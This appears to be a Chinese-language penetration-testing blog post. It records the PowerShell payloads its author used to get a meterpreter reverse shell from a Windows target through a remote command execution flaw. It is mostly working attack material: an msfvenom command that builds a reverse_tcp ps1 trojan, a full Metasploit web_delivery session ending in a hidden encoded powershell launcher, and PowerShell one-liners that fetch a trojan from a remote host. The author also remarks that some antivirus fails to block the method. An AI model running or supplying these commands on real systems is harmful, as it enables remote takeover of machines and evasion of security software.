在做一個小項目的過程中用到了 powershell 反彈 shell 到 msf,在本地和靶機分別做了幾次實驗,記錄下來 payload
一、msfvenom生成ps1木馬
msf 生成 ps1,傳到目標再遠程執行,但是 ps1 不能在 cmd 下執行,查資料了解到 cmd 執行如下命令可以將 powershell 腳本的默認打開方式選擇為 powershell.exe
ftype Microsoft.Powershellscript.1="%SystemRoot%\\system32\\windowspowershell\\v1.0\\powershell.exe" "%1"
msfvenom 生成 ps1 文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=打碼.打碼.打碼.打碼 LPORT=4545 --arch x64 --platform windows -f psh-reflection -o test.ps1
然后本地 cmd 直接執行 test.ps1 可以在 msf 接收到 meterpreter,但是上傳到靶機嘗試失敗了
二、web_delivery生成payload
msf5 exploit(multi/handler) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > info
Name: Script Web Delivery
Module: exploit/multi/script/web_delivery
Platform: Python, PHP, Windows, Linux, OSX
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2013-07-19
Provided by:
Andrew Smith "jakx" <jakx.ppr@gmail.com>
Ben Campbell <eat_meatballs@hotmail.co.uk>
Chris Campbell
Casey Smith
Trenton Ivey
g0tmi1k
bcoles <bcoles@gmail.com>
phra
Available targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 pubprn
5 PSH (Binary)
6 Linux
7 Mac OS X
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL falsenoNegotiate SSL for incoming connections
SSLCert noPath to a custom SSL certificate (default is randomly generated)
URIPATH noThe URI to use for this exploit (default is random)
Payload information:
Description:
This module quickly fires up a web server that serves a payload. The
provided command which will allow for a payload to download and
execute. It will do it either specified scripting language
interpreter or "squiblydoo" via regsvr32.exe for bypassing
application whitelisting. The main purpose of this module is to
quickly establish a session on a target machine when the attacker
has to manually type in the command: e.g. Command Injection, RDP
Session, Local Access or maybe Remote Command Execution. This attack
vector does not write to disk so it is less likely to trigger AV
solutions and will allow privilege escalations supplied by
Meterpreter. When using either of the PSH targets, ensure the
payload architecture matches the target computer or use SYSWOW64
powershell.exe to execute x86 payloads on x64 machines. Regsvr32
uses "squiblydoo" technique for bypassing application whitelisting.
The signed Microsoft binary file, Regsvr32, is able to request an
.sct file and then execute the included PowerShell command inside of
it. Similarly, the pubprn target uses the pubprn.vbs script to
request and execute a .sct file. Both web requests (i.e., the .sct
file and PowerShell download/execute) can occur on the same port.
"PSH (Binary)" will write a file to the disk, allowing for custom
binaries to be served up to be downloaded and executed.
References:
https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html
https://www.pentestgeek.com/2013/07/19/invoke-shellcode/
http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/
https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
https://iwantmore.pizza/posts/amsi.html
msf5 exploit(multi/script/web_delivery) > set target 2
target => 2
msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set lhost 打碼.打碼.打碼.打碼
lhost => 打碼.打碼.打碼.打碼
msf5 exploit(multi/script/web_delivery) > options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL falsenoNegotiate SSL for incoming connections
SSLCert noPath to a custom SSL certificate (default is randomly generated)
URIPATH noThe URI to use for this exploit (default is random)
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 打碼.打碼.打碼.打碼 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PSH
msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 打碼.打碼.打碼.打碼:4444
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/FVzfFyIpE3nU
[*] Local IP: http://打碼.打碼.打碼.打碼:8080/FVzfFyIpE3nU
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZw這一長段省略省略HcASQBNAFcAMABpADcAMABvAGwAJwApACkAOwA=
(又用到這個方式,驚奇的發現某些殺軟居然不攔)
三、powershell遠程下載payload1
"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" -command "invoke-webrequest -uri '木馬下載地址' -outfile '保存路徑帶文件名' "
四、powershell遠程下載payload2
本地測試成功,若使用編碼工具 base64 編碼時去掉 powershell 后面的雙引號,不然編碼后執行失敗,編碼工具下載地址 https://github.com/930201676/runtime-exec-payloads
powershell "$client=new-object System.Net.WebClient;$client.DownloadFile('木馬下載地址', '保存路徑帶文件名')"
五、總結
本地環境是 win10,靶機環境是 win2008,靶機有一個遠程命令執行漏洞,但是由於靶機上的 web 應用在未登錄狀態下,訪問任何 jsp 頁面(不論是否存在)都會跳轉到登錄界面,導致可以直接寫入木馬但是無法連接,所以嘗試用 powershell 反彈 shell 到 msf。由於不熟悉 powershell 和遠程命令執行因為編碼、特殊字符等問題崩潰走了好多彎路,如果有問題歡迎師傅們批評指正 tcltcl